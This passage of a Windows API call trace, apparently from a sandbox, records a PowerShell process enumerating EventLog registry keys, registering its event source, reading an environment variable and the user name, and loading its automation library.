	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x3, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] CoTaskMemFree (pv=0x0) 
	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x4, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.162] CoTaskMemFree (pv=0x3576b0) 
	[0355.162] CoTaskMemFree (pv=0x0) 
	[0355.162] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.162] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x5, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.163] CoTaskMemFree (pv=0x3576b0) 
	[0355.163] CoTaskMemFree (pv=0x0) 
	[0355.163] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.163] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x6, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.163] CoTaskMemFree (pv=0x3576b0) 
	[0355.163] CoTaskMemFree (pv=0x0) 
	[0355.163] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.163] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x7, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.163] CoTaskMemFree (pv=0x3576b0) 
	[0355.163] CoTaskMemFree (pv=0x0) 
	[0355.163] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.163] RegEnumKeyExW (in: hKey=0x348, dwIndex=0x8, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.163] CoTaskMemFree (pv=0x3576b0) 
	[0355.163] CoTaskMemFree (pv=0x0) 
	[0355.163] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x34c) returned 0x0
	[0355.163] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.163] RegOpenKeyExW (in: hKey=0x348, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x350) returned 0x0
	[0355.163] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.163] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x354) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x358) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x35c) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x360) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x364) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x368) returned 0x0
	[0355.164] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.164] RegOpenKeyExW (in: hKey=0x348, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x36c) returned 0x0
	[0355.165] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x370) returned 0x0
	[0355.165] RegCloseKey (hKey=0x370) returned 0x0
	[0355.165] RegCloseKey (hKey=0x348) returned 0x0
	[0355.165] RegCloseKey (hKey=0x36c) returned 0x0
	[0355.166] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cfc8 | out: phkResult=0x10cfc8*=0x36c) returned 0x0
	[0355.166] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.166] CoTaskMemFree (pv=0x0) 
	[0355.166] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.166] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.166] CoTaskMemFree (pv=0x3576b0) 
	[0355.166] CoTaskMemFree (pv=0x0) 
	[0355.166] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.166] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.166] CoTaskMemFree (pv=0x3576b0) 
	[0355.166] CoTaskMemFree (pv=0x0) 
	[0355.166] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.167] CoTaskMemFree (pv=0x3576b0) 
	[0355.167] CoTaskMemFree (pv=0x0) 
	[0355.167] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.167] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3576b0, lpcchName=0x10cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.168] CoTaskMemFree (pv=0x3576b0) 
	[0355.168] CoTaskMemFree (pv=0x0) 
	[0355.168] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x348) returned 0x0
	[0355.168] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.168] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x370) returned 0x0
	[0355.168] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.168] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x374) returned 0x0
	[0355.168] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.168] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x378) returned 0x0
	[0355.168] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.168] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x37c) returned 0x0
	[0355.168] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.169] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x380) returned 0x0
	[0355.169] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.169] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x384) returned 0x0
	[0355.169] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.169] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x388) returned 0x0
	[0355.169] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x0) returned 0x2
	[0355.169] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x38c) returned 0x0
	[0355.169] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d028 | out: phkResult=0x10d028*=0x390) returned 0x0
	[0355.169] RegCloseKey (hKey=0x390) returned 0x0
	[0355.170] RegCloseKey (hKey=0x36c) returned 0x0
	[0355.170] RegCloseKey (hKey=0x38c) returned 0x0
	[0355.171] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x38c) returned 0x0
	[0355.171] RegQueryInfoKeyW (in: hKey=0x38c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cf0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cf0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cf08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.171] CoTaskMemFree (pv=0x0) 
	[0355.171] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.171] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x0, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.171] CoTaskMemFree (pv=0x3576b0) 
	[0355.171] CoTaskMemFree (pv=0x0) 
	[0355.171] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.171] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x1, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.171] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x2, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x3, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x4, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x5, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x6, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.172] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.172] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x7, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.172] CoTaskMemFree (pv=0x3576b0) 
	[0355.172] CoTaskMemFree (pv=0x0) 
	[0355.173] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.173] RegEnumKeyExW (in: hKey=0x38c, dwIndex=0x8, lpName=0x3576b0, lpcchName=0x10cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0355.173] CoTaskMemFree (pv=0x3576b0) 
	[0355.173] CoTaskMemFree (pv=0x0) 
	[0355.173] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x36c) returned 0x0
	[0355.173] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.173] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x390) returned 0x0
	[0355.173] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.173] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x394) returned 0x0
	[0355.173] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.173] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x398) returned 0x0
	[0355.173] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.174] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x39c) returned 0x0
	[0355.174] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.174] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x3a0) returned 0x0
	[0355.174] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.174] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x3a4) returned 0x0
	[0355.174] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.174] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x3a8) returned 0x0
	[0355.174] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x0) returned 0x2
	[0355.174] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x3ac) returned 0x0
	[0355.174] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cff8 | out: phkResult=0x10cff8*=0x3b0) returned 0x0
	[0355.174] RegCloseKey (hKey=0x3b0) returned 0x0
	[0355.175] RegCloseKey (hKey=0x38c) returned 0x0
	[0355.175] RegCloseKey (hKey=0x3ac) returned 0x0
	[0355.181] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
	[0355.277] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x325c358*="WSMan", lpRawData=0x325c0c8) returned 1
	[0355.278] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.278] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0355.280] CoTaskMemAlloc (cb=0x804) returned 0x1b7d0ad0
	[0355.280] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d0ad0, nSize=0x10d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d288) returned 0x1
	[0355.281] CoTaskMemFree (pv=0x1b7d0ad0) 
	[0355.281] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0355.281] GetUserNameW (in: lpBuffer=0x3576b0, pcbBuffer=0x10d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d2c8) returned 1
	[0355.281] CoTaskMemFree (pv=0x3576b0) 
	[0355.281] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3261890*="Alias", lpRawData=0x3261620) returned 1
	[0355.283] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0355.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.283] CoTaskMemFree (pv=0x1b7a8b00) 
	[0355.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
